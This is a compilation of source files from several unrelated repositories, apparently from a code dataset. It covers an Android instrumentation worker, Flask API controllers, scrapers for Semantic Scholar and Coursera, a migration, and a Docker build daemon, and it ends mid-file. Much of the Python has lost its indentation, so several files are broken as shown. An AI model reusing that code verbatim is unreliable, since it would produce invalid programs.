elif serviceChose == 4:
print('\n')
        print('Thank you for using this tool')
        print('This tool was created by Jibble Einux')
print('Follow me:')
print('----------------------------------------------------')
print("Github: https://github.com/JibbleEinuxCODE ")
print("Facebook: https://facebook.com/JibbleEinuxCODE ")
print('----------------------------------------------------')
else:
continue
# Thanks everyone
# Jibble Einux
# www.facebook.com/JibbleEinuxCODE
# Contact me: <EMAIL>
``` |
{
"source": "jibbo/master_thesis",
"score": 2
} |
#### File: evaluations/devartist/DevARTistWorker.py
```python
from os import path
from DeviceWorker import DeviceWorker
from utils.apkdownload.download import ApkDownloader
from utils.shellutils import adb_install, adb_shell, adb_uninstall
class DevARTistWorker(DeviceWorker):
def __init__(self, group=None, target=None, name="DeviceProcess", args=(), kwargs={}, control_channel=None,
queue=None, report_queue=None, device_id=None,
apk_folder='.', artist_package = 'saarland.cispa.artist.artistgui', artist_activity = 'ArtistMainActivity'):
super(DevARTistWorker, self).__init__(group, target, name, args, kwargs, control_channel, queue, report_queue,
device_id, apk_folder, artist_package, artist_activity)
self.downloader = ApkDownloader()
def process(self, task):
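        # Pipeline for one app: download the APK, install it, monkey-test the
        # untouched app, reinstall, instrument it with ARTist, then monkey-test
        # the instrumented app with the same seed; cleanup always runs last.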
# local import to avoid circular dependency
from evaluations.trace_logging.TraceLoggingEvaluator import TraceLoggingEvaluator
app = task.package
seed = self.generate_monkey_seed()
app_path = self.generate_app_path(app)
self.start_task(task)
try:
# download app
self.start_subtask(TraceLoggingEvaluator.SUBTASK_DOWNLOAD_APP)
self.downloader.download_if_not_exist(app, self.apk_folder)
# TODO let the download method directly return whether it worked or not
download_succ = path.exists(app_path)
self.conclude_subtask(download_succ)
if not download_succ:
self.log('App not downloaded. Abort.')
return
# install app for the first time
self.start_subtask(TraceLoggingEvaluator.SUBTASK_INSTALL_APP_1)
(success2, out2) = adb_install(app_path, device=self.device_id)
self.log(out2)
self.conclude_subtask(success2, include_logcat=True)
if not success2:
return
# test uninstrumented app. We are interested in whether apps might be broken already BEFORE we instrument
self.start_subtask(TraceLoggingEvaluator.SUBTASK_TEST_UNINSTRUMENTED)
success3 = self.monkey_test(app, seed)
self.conclude_subtask(success3, include_logcat=True)
if not success3:
return
# clean (re)installation of app
self.start_subtask(TraceLoggingEvaluator.SUBTASK_INSTALL_APP_2)
(success4, out4) = adb_install(app_path, device=self.device_id)
self.log(out4)
self.conclude_subtask(success4, include_logcat=True)
if not success4:
return
# instrument app
self.start_subtask(TraceLoggingEvaluator.SUBTASK_INSTRUMENT)
success5 = self.instrument(app)
self.conclude_subtask(success5, include_logcat=True)
if not success5:
return
# test instrumented app again with the same seed
self.start_subtask(TraceLoggingEvaluator.SUBTASK_TEST_INSTRUMENTED)
success6 = self.monkey_test(app, seed)
self.conclude_subtask(success6, include_logcat=True)
# always cleanup no matter where we finish
finally:
self.cleanup(task)
# best effort cleanup since we do not know what apps and data are still on the device
def cleanup(self, task):
from evaluations.trace_logging.TraceLoggingEvaluator import TraceLoggingEvaluator
self.start_subtask(TraceLoggingEvaluator.SUBTASK_CLEANUP)
app_package = task.package
self.log('Clean up for task ' + app_package)
artist_succ, artist_out = adb_shell('am force-stop ' + self.artist_package, device=self.device_id)
self.log(('un' if not artist_succ else '') + 'successfully stopped ARTistGUI')
self.log(artist_out)
app_succ, app_out = adb_uninstall(app_package, device=self.device_id)
self.log(('un' if not app_succ else '') + 'successfully deinstalled ' + app_package + ': ')
self.log(app_out)
# delete all result files
del_succ, del_out = adb_shell('rm ' + self.instrumentation_result_path() + '*', device=self.device_id)
self.log(('un' if not del_succ else '') + 'successfully removed result files: ')
self.log(del_out)
# TODO in order to reliably report whether cleaning up worked,
# we need to find out what needs to be cleaned up and then check if it worked.
# Either we remember it during the processing or simply probe whether an app is installed or a file is present
self.conclude_subtask(True, include_logcat=True)
``` |
{
"source": "Jibbow/research-paper-graph",
"score": 3
} |
#### File: main/controller/family_controller.py
```python
from flask import request
from flask_restplus import Resource
from ..dto.relativeDto import RelativeDto
from ..service.family_service import get_preceding, get_succeeding, get_entire
api = RelativeDto.api
_relative = RelativeDto.relative
@api.route('/preceding/')
class PrecedingFamily(Resource):
"""Handle a preceding paper family."""
@api.response(200, 'The preceding family of the paper has been listed.')
@api.response(404, 'The paper has not been found.')
@api.doc('List the preceding family of the paper.',
params={'paper': 'Paper',
'distance': 'Distance',
'year': 'Year',
'citations': 'Citations'})
@api.marshal_with(_relative)
def get(self):
"""List all preceding relatives of a paper."""
relative = request.args.get('paper')
distance = request.args.get('distance')
year = request.args.get('year')
citations = request.args.get('citations')
return get_preceding(relative, distance, year, citations)
@api.route('/succeeding/')
class SucceedingFamily(Resource):
"""Handle a succeeding paper family."""
@api.response(200, 'The succeeding family of the paper has been listed.')
@api.response(404, 'The paper has not been found.')
@api.doc('List the succeeding family of the paper.',
params={'paper': 'Paper',
'distance': 'Distance',
'year': 'Year',
'citations': 'Citations'})
@api.marshal_with(_relative)
def get(self):
"""List all succeeding relatives of a paper."""
relative = request.args.get('paper')
distance = request.args.get('distance')
year = request.args.get('year')
citations = request.args.get('citations')
return get_succeeding(relative, distance, year, citations)
@api.route('/entire/')
class EntireFamily(Resource):
"""Handle an entire paper family."""
@api.response(200, 'The entire family of the paper has been listed.')
@api.response(404, 'The paper has not been found.')
@api.doc('List the entire family of the paper.',
params={'paper': 'Paper',
'distance': 'Distance',
'year': 'Year',
'citations': 'Citations'})
@api.marshal_with(_relative)
def get(self):
"""List all preceding relatives of a paper."""
relative = request.args.get('paper')
distance = request.args.get('distance')
year = request.args.get('year')
citations = request.args.get('citations')
return get_entire(relative, distance, year, citations)
```
#### File: main/controller/paper_controller.py
```python
from flask_restplus import Resource
from flask import request
from ..dto.paperDto import PaperDto
from ..service.paper_service import post, get_all, get, search, delete_all, delete
api = PaperDto.api
_paper = PaperDto.paper
@api.route('/')
class Papers(Resource):
"""Handle all papers."""
@api.response(200, 'All papers have been listed.')
@api.doc('List all papers.')
@api.marshal_list_with(_paper, envelope='data')
def get(self):
"""List all papers."""
return get_all()
@api.response(201, 'The paper has been created.')
@api.response(409, 'The paper already exists.')
@api.doc('Create a new paper.')
@api.expect(_paper, validate=True)
def post(self):
"""Create a new paper."""
data = request.json
return post(data=data)
@api.response(200, 'All papers have been deleted.')
@api.doc('Delete all papers.')
@api.marshal_list_with(_paper, envelope='data')
def delete(self):
"""Delete all papers."""
return delete_all()
@api.route('/<title>')
class Paper(Resource):
"""Handle one paper."""
@api.response(200, 'The paper has been found.')
@api.response(404, 'The paper has not been found.')
@api.doc('Display the paper with the title you are looking for.')
@api.marshal_with(_paper)
def get(self, title):
"""Display the paper with the title you are looking for."""
paper = get(title)
if not paper:
return api.abort(404)
return paper
@api.response(200, 'The paper has been deleted.')
@api.response(404, 'The paper has not been found.')
@api.doc('Delete the paper with the title you are looking for.')
@api.marshal_with(_paper)
def delete(self, title):
"""Delete the paper with the title you are looking for."""
paper = self.get(title)
delete(title)
return paper
@api.route('/search/<keyword>')
class KeywordPapers(Resource):
"""Handle all papers that contain a keyword."""
@api.response(200, 'All papers that contain the searched keyword have been listed.')
@api.doc('List all papers that contain a searched keyword.')
@api.marshal_list_with(_paper)
def get(self, keyword):
"""List all papers that contain a searched keyword."""
return search(keyword)
```
#### File: app/test/test_config.py
```python
import unittest
from flask import current_app
from flask_testing import TestCase
from app import app
class TestDevelopmentConfig(TestCase):
"""Tests the development configuration"""
def create_app(self):
"""Create an app for development"""
app.config.from_object('app.main.config.DevelopmentConfig')
return app
def test_app_is_development(self):
"""Check if the app is in development"""
self.assertFalse(app.config['SECRET_KEY'] == 'my_precious')
self.assertTrue(app.config['DEBUG'] is True)
self.assertFalse(current_app is None)
uri = 'postgresql://postgres@localhost/research'
self.assertTrue(
app.config['SQLALCHEMY_DATABASE_URI'] == uri
)
class TestTestingConfig(TestCase):
"""Tests the testing configuration"""
def create_app(self):
"""Create an App for test"""
app.config.from_object('app.main.config.TestingConfig')
return app
def test_app_is_testing(self):
"""Check if the app is in test"""
self.assertFalse(app.config['SECRET_KEY'] == 'my_precious')
self.assertTrue(app.config['DEBUG'])
uri = 'postgresql://postgres@localhost/research'
self.assertTrue(
app.config['SQLALCHEMY_DATABASE_URI'] == uri
)
class TestProductionConfig(TestCase):
"""Tests the production configuration"""
def create_app(self):
"""Create an app for production"""
app.config.from_object('app.main.config.ProductionConfig')
return app
def test_app_is_production(self):
"""Check if the app is in production"""
self.assertTrue(app.config['DEBUG'] is False)
if __name__ == '__main__':
unittest.main()
```
#### File: migrations/versions/9d48ba00567c_.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9d48ba00567c'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('author',
sa.Column('id', sa.String(length=42), nullable=False),
sa.Column('name', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('paper',
sa.Column('id', sa.String(length=42), nullable=False),
sa.Column('title', sa.String(length=255), nullable=False),
sa.Column('year', sa.Integer(), nullable=True),
sa.Column('abstract', sa.Text(), nullable=False),
sa.Column('citations', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('reference',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('from_paper', sa.String(length=42), nullable=True),
sa.Column('to_paper', sa.String(length=42), nullable=True),
sa.Column('isInfluential', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('write',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('paper', sa.String(length=42), nullable=True),
sa.Column('author', sa.String(length=42), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('write')
op.drop_table('reference')
op.drop_table('paper')
op.drop_table('author')
# ### end Alembic commands ###
```
#### File: backend/scraper/__init__.py
```python
import semanticscholar as ss
import requests
def scrape(): # pylint:disable=too-many-locals
"""Scrape research papers from the Semantic Scholar API"""
# Determine the ids of all relevant research papers.
papers = get_all_papers()
for paperId in papers:
# Get all relevant information for the paper: id, title, abstract, year
paper = ss.paper(paperId)
paperTitle = paper['title']
paperAbstract = paper['abstract']
paperYear = paper['year']
citations = paper['citations']
paperCitations = len(citations)
# Put the given paper into the database.
post_paper(paperId, paperTitle, paperAbstract, paperYear, paperCitations)
# Get all relevant information for the author: id, name
authors = paper['authors']
for author in authors:
authorId = author['authorId']
authorName = author['name']
# Put the given author and writing relation into the database.
post_author(authorId, authorName)
post_write(paperId, authorId)
# Get all references.
# A reference is a paper that the current paper cites/uses.
references = paper['references']
for reference in references:
referenceId = reference['paperId']
referenceIsInfluential = reference['isInfluential']
post_reference(paperId, referenceId, referenceIsInfluential)
# Get all citations.
# A citation is a paper that cites/uses the given paper.
for citation in citations:
citationId = citation['paperId']
citationIsInfluential = citation['isInfluential']
post_reference(citationId, paperId, citationIsInfluential)
def get_all_papers():
"""Determine the ids of all relevant research papers."""
neumann = 143993045
valenzuela = 143990000
li = 144000000
grant = 144100000
kemper = 144122431
authorIds = [neumann, valenzuela, li, grant, kemper]
paperIds = []
for authorId in authorIds:
author = ss.author(authorId)
papers = []
if author != {}:
papers = author['papers']
for paper in papers:
paperId = paper['paperId']
paperIds.append(paperId)
return paperIds
def post_paper(paper_id, paper_title, paper_abstract, paper_year, paper_citations):
"""Put the given paper into the database."""
data = {'id':paper_id,
'title':paper_title,
'abstract':paper_abstract,
'year':paper_year,
'citations':paper_citations
}
r = requests.post(url='http://127.0.0.1:5000/paper/', json=data)
print(r.status_code)
def post_author(author_id, author_name):
"""Post the given author into the database."""
data = {'id':author_id,
'name':author_name,
}
r = requests.post(url='http://127.0.0.1:5000/author/', json=data)
print(r.status_code)
def post_write(paper, author):
"""Post the given writing relation into the database."""
data = {'paper':paper,
'author':author,
}
r = requests.post(url='http://127.0.0.1:5000/write/', json=data)
print(r.status_code)
def post_reference(source, sink, isInfluential):
"""Post the given reference into the database."""
data = {'from_paper':source,
'to_paper':sink,
'is_influential': isInfluential,
}
r = requests.post(url='http://127.0.0.1:5000/reference/', json=data)
print(r.status_code)
scrape()
``` |
{
"source": "jibby0/service-auto-analyzer",
"score": 2
} |
#### File: commons/triggering_training/retraining_defect_type_triggering.py
```python
import logging
from commons.object_saving.object_saver import ObjectSaver
from commons.triggering_training import abstract_triggering_training
logger = logging.getLogger("analyzerApp.retraining_defect_type_triggering")
class RetrainingDefectTypeTriggering(abstract_triggering_training.AbstractTrainingTrigger):
def __init__(self, app_config, start_number=100, accumulated_difference=100):
self.object_saver = ObjectSaver(app_config)
self.start_number = start_number
self.accumulated_difference = accumulated_difference
def remove_triggering_info(self, train_info):
self.object_saver.remove_project_objects(
train_info["project_id"], ["defect_type_trigger_info"])
def get_triggering_info(self, train_info):
return self.object_saver.get_project_object(
train_info["project_id"], "defect_type_trigger_info", using_json=True)
def save_triggering_info(self, trigger_info, train_info):
self.object_saver.put_project_object(
trigger_info, train_info["project_id"],
"defect_type_trigger_info", using_json=True)
def clean_defect_type_triggering_info(self, train_info, num_logs_with_defect_types):
trigger_info = self.get_triggering_info(train_info)
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types"] = num_logs_with_defect_types
self.save_triggering_info(trigger_info, train_info)
def should_model_training_be_triggered(self, train_info):
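        # Accumulate counters in object storage and trigger training once the
        # total number of labelled logs reaches start_number and at least
        # accumulated_difference of them arrived since the last training run.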
trigger_info = self.get_triggering_info(train_info)
if "num_logs_with_defect_types" not in trigger_info:
trigger_info["num_logs_with_defect_types"] = 0
trigger_info["num_logs_with_defect_types"] += train_info["num_logs_with_defect_types"]
if "num_logs_with_defect_types_since_training" not in trigger_info:
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types_since_training"] += train_info["num_logs_with_defect_types"]
self.save_triggering_info(trigger_info, train_info)
return trigger_info["num_logs_with_defect_types"] >= self.start_number\
and trigger_info["num_logs_with_defect_types_since_training"] >= self.accumulated_difference
``` |
{
"source": "JibbyJames/coursera-data-scraper",
"score": 3
} |
#### File: JibbyJames/coursera-data-scraper/main.py
```python
import json
import time
import urllib.request
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
def expand_list(df, list_column, new_column):
lens_of_lists = df[list_column].apply(len)
origin_rows = range(df.shape[0])
destination_rows = np.repeat(origin_rows, lens_of_lists)
non_list_cols = (
[idx for idx, col in enumerate(df.columns)
if col != list_column]
)
expanded_df = df.iloc[destination_rows, non_list_cols].copy()
expanded_df[new_column] = (
[item for items in df[list_column] for item in items]
)
expanded_df.reset_index(inplace=True, drop=True)
return expanded_df
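# Example (sketch): expand_list(specs_df, 'partners', 'partner_name') turns a row
# with partners=['A', 'B'] into two rows whose 'partner_name' column holds
# 'A' and 'B' respectively; the original list column is dropped.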
run_locally = True
wait_length = 0.5
algolia_url = 'https://lua9b20g37-dsn.algolia.net/1/indexes/test_products?x-algolia-application-id=LUA9B20G37&x-algolia-api-key=dcc55281ffd7ba6f24c3a9b18288499b&hitsPerPage=1000&page='
product_pages = 4
## Fetch the data ##########################################################
if(run_locally):
print(f"Reading courses from local file courses.json.")
courses_df = pd.read_json('courses.json', orient='records')
print(f"Reading courses from local file specializations.json.")
specs_df = pd.read_json('specializations.json', orient='records')
else:
all_products_list = []
# Loop through each of the pages returned for the all products request
for i in range(0, product_pages + 1):
# Request data from algolia for current page
with urllib.request.urlopen(f'{algolia_url}{i}') as url:
print(f"Fetching coursera program data on page {i}.")
page_data = json.loads(url.read().decode())
# Save page data to local json file.
with open(f'all-products-{i}.json', 'w') as outfile:
json.dump(page_data, outfile)
# Merge all products data into single list.
all_products_list = all_products_list + page_data['hits']
# Wait before scraping next data
time.sleep(wait_length)
# Convert raw products json data into datframe
all_products_df = pd.DataFrame.from_dict(all_products_list)
# Group Courses, and clean data before creating dict
courses_df = all_products_df.loc[all_products_df['entityType'] == 'COURSE'].reset_index(drop=True)
courses_df['id'] = courses_df.apply(lambda row: row['objectID'].replace('course~',''), axis=1)
courses_df = courses_df.set_index('id')
courses = courses_df.to_dict('index')
# Group Specializations, and clean data before creating dict
specs_df = all_products_df.loc[all_products_df['entityType'] == 'SPECIALIZATION'].reset_index(drop=True)
specs_df['id'] = specs_df.apply(lambda row: row['objectID'].replace('s12n~',''), axis=1)
specs_df = specs_df.set_index('id')
specs = specs_df.to_dict('index')
# Loop through all specializations to collect their courses
loop_length = len(specs.keys())
for index, spec_id in enumerate(list(specs.keys())[:loop_length]):
# Get specialization URL
specs[spec_id]['courses'] = []
spec_row = specs[spec_id]
slug = spec_row['objectUrl'].replace("/specializations/", "")
print(f"[{index+1}/{loop_length}] - Fetching course data for \"{slug}\"")
spec_url = f"https://www.coursera.org/api/onDemandSpecializations.v1?q=slug&slug={slug}&fields=courseIds,id"
# Make a request to that URL
with urllib.request.urlopen(spec_url) as url:
# Parse the JSON response.
spec_data = json.loads(url.read().decode())
course_ids = spec_data['elements'][0]['courseIds']
# Loop through each course
for course_id in course_ids:
# Check that we have a record of this course already from Algolia
if course_id not in courses:
print(f" - {course_id} - 404")
else:
# Initialize specs array for course if required.
if 'specializations' not in courses[course_id].keys():
courses[course_id]['specializations'] = []
print(f" - {courses[course_id]['name']}")
# Add Specialization to Course, and vice versa
if spec_id not in courses[course_id]['specializations']:
courses[course_id]['specializations'].append(spec_id)
if course_id not in specs[spec_id]['courses']:
specs[spec_id]['courses'].append(course_id)
# Wait before scraping next data
time.sleep(wait_length)
# Convert back to DF and save to local JSON
specs_df = pd.DataFrame.from_dict(specs, orient='index')
specs_df.to_json('specializations.json')
# Pricing Data for courses
loop_length = len(courses.keys())
for index, course_id in enumerate(list(courses.keys())[:loop_length]):
print(f"[{index+1}/{loop_length}] - Fetching price data for \"{courses[course_id]['name']}\"")
courses[course_id]['price'] = 0
price_url = f"https://www.coursera.org/api/productPrices.v3/VerifiedCertificate~{course_id}~GBP~GB"
try:
with urllib.request.urlopen(price_url) as url:
price_data = json.loads(url.read().decode())
courses[course_id]['price'] = price_data['elements'][0]['amount']
print(f'{courses[course_id]["name"]}: £{courses[course_id]["price"]}')
except:
print(f'{courses[course_id]["name"]}: ERROR - Not found')
# Wait before scraping next data
time.sleep(wait_length)
# Convert back to DF and save to JSON
courses_df = pd.DataFrame.from_dict(courses, orient='index')
courses_df.to_json('courses.json')
## Aggregate metrics ###########################################
# Add some fields for later use
specs_df['partners_str'] = specs_df.apply(lambda x : 'Offered by ' + ' & '.join(x['partners']),axis=1)
specs_df['specialization'] = specs_df['name'] + '\n' + specs_df['partners_str']
courses_df['partners_str'] = courses_df.apply(lambda x : 'Offered by ' + ' & '.join(x['partners']),axis=1)
courses_df['course'] = courses_df['name'] + '\n' + courses_df['partners_str']
# Expand the lists we want to aggregate in the specializations table
specs_df['courses'] = specs_df['courses'].apply(lambda d: d if isinstance(d, list) else [])
specs_with_expanded_courses_df = expand_list(specs_df, 'courses', 'course_id')
specs_with_expanded_partners_df = expand_list(specs_df, 'partners', 'partner_name')
# Join to the courses dataframe for additional metrics and clean columns names.
merged_specs_df = pd.merge(specs_with_expanded_courses_df, courses_df, left_on='course_id', right_index=True)
aggd_specs_df = merged_specs_df.groupby('specialization', as_index=False).sum()[['specialization','avgLearningHours_y','price']]
aggd_specs_df.rename(columns={'avgLearningHours_y': 'avgLearningHours'}, inplace=True)
## Plot some graphs ############################################
# Init Seaborn style
sns.set(style="whitegrid")
# What are some general stats on all specializations?
fig, axes = plt.subplots(4, 1)
sns.boxplot(x='enrollments', data=specs_df, ax=axes[0])
sns.boxplot(x='avgLearningHours', data=aggd_specs_df, ax=axes[1])
sns.boxplot(x='price', data=aggd_specs_df, ax=axes[2])
sns.boxplot(x='avgProductRating', data=specs_df, ax=axes[3])
# What are the most popular specializations?
top_specs_enrollments = specs_df.nlargest(15,'enrollments')
sns.barplot(x="enrollments", y="specialization", data=top_specs_enrollments)
# What are the most popular courses?
top_courses_enrollments = courses_df.nlargest(15,'enrollments')
sns.barplot(x="enrollments", y="course", data=courses_df)
# Are popular courses generally rated higher? (min number of enrollments)
sns.scatterplot(x="enrollments", y="avgProductRating", data=specs_df)
#courses_df.boxplot()
# Do longer courses have fewer enrollments?
# Scatter
# Do more expensive courses have fewer enrollments?
# Scatter
# Is there an organisation that provides the best courses?
# Does specialization duration have an impact on enrollments or reviews?
# Does price?
# What are the top ten courses by enrollments
``` |
{
"source": "jibe-b/bioshadock",
"score": 2
} |
#### File: jibe-b/bioshadock/builder.py
```python
import sys
import signal
import os
import time
from io import BytesIO
import logging
import logging.config
import requests
import base64
import json
import datetime
import time
from pymongo import MongoClient
from bson import json_util
from bson.json_util import loads
from bson.objectid import ObjectId
import redis
import re
import subprocess
import tempfile
import shutil
import yaml
from daemon import Daemon
from docker import Client
from git.repo.base import Repo
from logentries import LogentriesHandler
from clair.clair import Clair
import copy
from elasticsearch import Elasticsearch
requests.packages.urllib3.disable_warnings()
class BioshadockDaemon(Daemon):
es = None
db_mongo = None
db_redis = None
cli = None
run_once = False
def test(self, build, container_id):
pass
def analyse_with_clair(self, image_id):
self.log.debug('Analyse '+image_id+' with Clair')
cfg = {
'clair.host': self.config['clair']['host'],
'docker.connect': self.config['services']['docker']['connect']
}
clair_analyse = Clair(cfg)
layers = clair_analyse.analyse(image_id)
layer_ids = []
for layer in layers:
layer_ids.append(layer['id'])
return layer_ids
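# Hedged usage sketch (assumes the Clair host and Docker socket from config.yaml are reachable;
# the image name below is a hypothetical example):
#   layer_ids = daemon.analyse_with_clair('registry.example.org/ns/tool:latest')
# The returned layer ids end up in MongoDB under 'meta.layers' and are later used by
# container_vulnerabilities() in shadock/views.py to query Clair for known vulnerabilities.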
def stats(self):
config_file = "config.yaml"
if "BIOSHADOCK_CONFIG" in os.environ:
config_file = os.environ["BIOSHADOCK_CONFIG"]
self.config= None
with open(config_file, 'r') as ymlfile:
self.config = yaml.load(ymlfile)
BioshadockDaemon.db_redis = redis.StrictRedis(
host=self.config['services']['redis']['host'],
port=self.config['services']['redis']['port'],
db=self.config['services']['redis']['db']
)
queues = BioshadockDaemon.db_redis.hkeys('bioshadock:user:builds')
print("Build usage:")
for queue in queues:
print("\t%s: %s, in queue: %d" % (queue,
BioshadockDaemon.db_redis.hget('bioshadock:user:builds', queue),
BioshadockDaemon.db_redis.llen('bioshadock:builds:' + queue)))
sys.exit(0)
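# run() is the main worker loop: it lazily connects to MongoDB, Elasticsearch, Redis and Docker,
# then repeatedly pops queued build requests (one user queue at a time, round-robin) until
# /tmp/bioshadocker-builder.stop exists or run_once is set.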
def run(self):
config_file = "config.yaml"
if "BIOSHADOCK_CONFIG" in os.environ:
config_file = os.environ["BIOSHADOCK_CONFIG"]
self.config= None
with open(config_file, 'r') as ymlfile:
self.config = yaml.load(ymlfile)
if self.config['log_config'] is not None:
for handler in list(self.config['log_config']['handlers'].keys()):
self.config['log_config']['handlers'][handler] = dict(self.config['log_config']['handlers'][handler])
logging.config.dictConfig(self.config['log_config'])
log = logging.getLogger('builder')
self.log = log
'''
config = ConfigParser.ConfigParser()
config.readfp(open(config_file))
self.config = config
logging.config.fileConfig(config_file)
log = logging.getLogger(__name__)
self.log = log
if config.has_option('app:main', 'logentries'):
log.addHandler(
LogentriesHandler(config.get('app:main', 'logentries')))
'''
log.warn("Starting a builder")
do_squash = False
if self.config['general']['squash']['use'] == 1:
do_squash = True
queue_counter = 0
while True:
if os.path.exists('/tmp/bioshadocker-builder.stop'):
log.warn('Request to exit: /tmp/bioshadocker-builder.stop')
break
log.debug("New build run")
if BioshadockDaemon.db_mongo is None:
mongo = MongoClient(self.config['services']['mongo']['url'])
BioshadockDaemon.db_mongo = mongo[self.config['services']['mongo']['db']]
if BioshadockDaemon.es is None:
BioshadockDaemon.es = Elasticsearch(self.config['services']['elastic']['host'].split(','))
if BioshadockDaemon.db_redis is None:
BioshadockDaemon.db_redis = redis.StrictRedis(
host=self.config['services']['redis']['host'],
port=self.config['services']['redis']['port'],
db=self.config['services']['redis']['db']
)
if BioshadockDaemon.cli is None:
timeout=1800
if self.config['services']['docker']['timeout']:
timeout = self.config['services']['docker']['timeout']
if self.config['services']['docker']['connect']:
BioshadockDaemon.cli = Client(
base_url=self.config['services']['docker']['connect'],
timeout=timeout
)
else:
BioshadockDaemon.cli = Client(timeout=timeout)
if self.config['registry']['push'] == 0:
log.debug('Local docker, not using registry')
else:
BioshadockDaemon.cli.login(
username=self.config['registry']['auth']['user'],
password=self.config['registry']['auth']['password'],
email=self.config['registry']['auth']['email'],
registry=self.config['registry']['service'])
queues = BioshadockDaemon.db_redis.hkeys('bioshadock:user:builds')
user_id = None
if queue_counter >= len(queues):
log.debug("Queue: go back to beginning")
queue_counter = 0
build = None
while build is None and queue_counter < len(queues):
user_id = queues[queue_counter]
log.debug("Queue:Check:%s" % (user_id))
build = BioshadockDaemon.db_redis.lpop('bioshadock:builds:' + user_id)
queue_counter += 1
dockerfile = None
if build is not None:
log.info("Build queue: %s" % (user_id))
build = loads(build)
log.info('Build request: ' + str(build['id']))
BioshadockDaemon.db_mongo['builds'].update(
{'_id': ObjectId(build['build'])}, {'$set': {'progress': 'building'}})
dt = datetime.datetime.now()
timestamp = time.mktime(dt.timetuple())
# log.debug(str(build))
dockerfile = build['dockerfile']
gitrepo = build['git']
do_git = False
git_repo_dir = None
# CWL
is_cwl = False
cwl_is_url = False
cwl = None
entrypoint = None
description = None
tags = []
size = None
labels = []
layer_ids = []
clair_check = False
if 'cwl_path' in build and build['cwl_path'] and build['cwl_path'] != 'none':
is_cwl = True
build['cwl_path'] = build['cwl_path'].encode('utf-8')
if build['cwl_path'].startswith('http'):
cwl_is_url = True
try:
r = requests.get(build['cwl_path'])
cwl = r.text.encode('utf-8')
except Exception as e:
log.error(
'Could not get CWL: ' + str(build['cwl_path']) + " " + str(e))
git_repo_dir = None
if gitrepo is not None and gitrepo and gitrepo != 'none':
# dockerfile
git_repo_dir = tempfile.mkdtemp(suffix='.git')
do_git = True
git_info = gitrepo.split('#')
gitrepo = git_info[0]
selectedbranch = 'master'
subdir = None
if len(git_info) > 1:
branch_path = git_info[1].split(':')
if branch_path[0]:
selectedbranch = branch_path[0]
if len(branch_path) > 1 and branch_path[1]:
subdir = branch_path[1]
log.debug("Temporary directory: " + str(gitrepo))
log.info("Using branch " + selectedbranch)
log.info("Directory: " + str(subdir))
try:
Repo.clone_from(
gitrepo, git_repo_dir, branch=selectedbranch)
if is_cwl and not cwl_is_url:
if build['cwl_path'].startswith('/'):
build['cwl_path'] = build['cwl_path'][1:]
cwl_file = os.path.join(
git_repo_dir, build['cwl_path'])
if not os.path.exists(cwl_file):
log.error(
'Could not get CWL: ' + str(build['cwl_path']))
else:
with open(cwl_file, "r") as cwlFile:
cwl = cwlFile.read().encode('utf-8')
if subdir is not None:
git_repo_dir = os.path.join(git_repo_dir, subdir)
log.debug(str(git_repo_dir))
os.chdir(git_repo_dir)
except Exception as e:
logging.error('Git error: ' + str(e))
BioshadockDaemon.db_mongo['builds'].update({'_id':
ObjectId(
build[
'build'])},
{'$set': {'progress': 'failed',
'response': [str(e)]
}
})
continue
# if dockerfile:
if not os.path.exists("Dockerfile"):
log.debug("Overwrite Dockerfile")
f = open('Dockerfile', 'w')
f.write(dockerfile.encode('utf-8'))
f.close()
else:
try:
log.debug("Use git Dockerfile")
with open("Dockerfile", "r") as gitDockerfile:
dockerfile = gitDockerfile.read().encode('utf-8')
except Exception as e:
log.error('Failed to decode Docker file: '+str(e))
build['progress'] = 'failed'
build['response'] = ['Failed to decode dockerfile: '+str(e)]
BioshadockDaemon.db_mongo['builds'].update(
{'_id': ObjectId(build['build'])}, build)
continue
f = BytesIO(dockerfile.encode('utf-8'))
build_tag = ''
info_tag = 'latest'
if 'tag' in build and build['tag']:
build_tag = ':' + build['tag']
info_tag = build['tag']
log.warn('Build: ' + str(build['id']) + ':' + str(info_tag))
response = []
container_inspect = None
build_ok = False
try:
orig_build_tag = build_tag
if do_squash:
build_tag = ":squash"
if do_git:
response = [line for line in BioshadockDaemon.cli.build(
path=git_repo_dir, rm=True, tag=self.config['registry']['service'] + "/" + build['id'] + build_tag, nocache=True, timeout=self.config['services']['docker']['timeout'])]
else:
response = [line for line in BioshadockDaemon.cli.build(
fileobj=f, rm=True, tag=self.config['registry']['service'] + "/" + build['id'] + build_tag, nocache=True, timeout=self.config['services']['docker']['timeout'])]
except Exception as e:
log.error('Build error: ' + str(e))
response += [str(e)]
try:
container_inspect = BioshadockDaemon.cli.inspect_image(
self.config['registry']['service'] + "/" + build['id'] + build_tag)
build_ok = True
except Exception as e:
log.error('Inspect error: ' + str(e))
response += [str(e)]
build['response'] = []
for res in response:
try:
json_res = json.loads(res)
build['response'].append(json_res['stream'])
except Exception as e:
log.debug('Failed to decode json from stream output')
build['response'].append(res)
if build['response'] and build_ok:
log.debug(str(response))
last = build['response'][len(build['response']) - 1]
matches = re.search(r'Successfully built\s+(\w+)', last)
if matches is None:
build['status'] = False
log.info('Build error: ' + str(build['id']))
else:
log.info('Successful build: ' + str(build['id']))
build['status'] = True
build['image_id'] = matches.group(1)
tests = []
if container_inspect is not None:
entrypoint = container_inspect['Config']['Entrypoint']
size = container_inspect['VirtualSize']
log.debug(
str(container_inspect['Config']['Labels']))
for label in list(container_inspect['Config']['Labels'].keys()):
label_elts = container_inspect[
'Config']['Labels'][label]
if label.lower().endswith('description'):
description = label_elts
if label.lower().endswith('tags'):
tags = label_elts.split(',')
if label_elts.startswith('{') or label_elts.startswith('['):
try:
label_elts = json.loads(label_elts)
except Exception as e:
log.debug(
"Failed to decode JSON for " + str(build['id']) + ": " + str(label))
